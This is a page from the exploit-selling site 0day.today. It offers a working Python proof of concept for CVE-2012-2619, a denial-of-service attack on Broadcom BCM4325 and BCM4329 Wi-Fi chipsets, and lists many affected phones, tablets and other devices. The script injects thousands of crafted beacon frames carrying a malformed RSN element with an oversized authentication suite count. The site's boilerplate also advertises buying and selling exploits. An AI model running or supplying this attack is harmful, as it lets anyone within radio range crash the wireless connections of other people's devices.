0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Broadcom DoS on BCM4325 and BCM4329 Devices
[# Exploit Author:
CoreLabs (Core Security Technologies) fue descubierta por el
investigador argentino Andrés Blanco,
# Vendor Homepage:
# Software Link: [download link if available]
# Version: 1.0
# Tested on:
Apple iPhone 3GS
Apple iPod 2G
HTC Touch Pro 2
HTC Droid Incredible
Samsung Spica
Acer Liquid
Motorola Devour
Vehículo Ford Edge
Dispositivos afectados con el chipset BCM4329:
Apple iPhone 4
Apple iPhone 4 Verizon
Apple iPod 3G
Apple iPad Wi-Fi
Apple iPad 3G
Apple iPad 2
Apple Tv 2G
Motorola Xoom
Motorola Droid X2
Motorola Atrix
Samsung Galaxy Tab
Samsung Galaxy S 4G
Samsung Nexus S
Samsung Stratosphere
Samsung Fascinate
HTC Nexus One
HTC Evo 4G
HTC ThunderBolt
HTC Droid Incredible 2
LG Revolution
Sony Ericsson Xperia Play
Pantech Breakout
Nokia Lumina 800
Kyocera Echo
Asus Transformer Prime
Malata ZPad"
# CVE : 2012-2619
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096
# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += '\x00' # Flags: 0
frame += '\x00\x00' # Duration: 0
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
#part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
frame += '\x11\x04' # Capability Information: ESS, Privacy,
#Short Slot time
# Information Elements
# SSID: buggy
frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
frame += '\x01\x00' # Pairwise cipher suite count: 1
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
frame += '\xff\xff' # Authentication suites count: 65535
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
frame += '\x00\x00'
sequence += 1
yield frame
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)
iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()
generator = beaconFrameGenerator()
for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)
# 0day.today [2024-12-26] #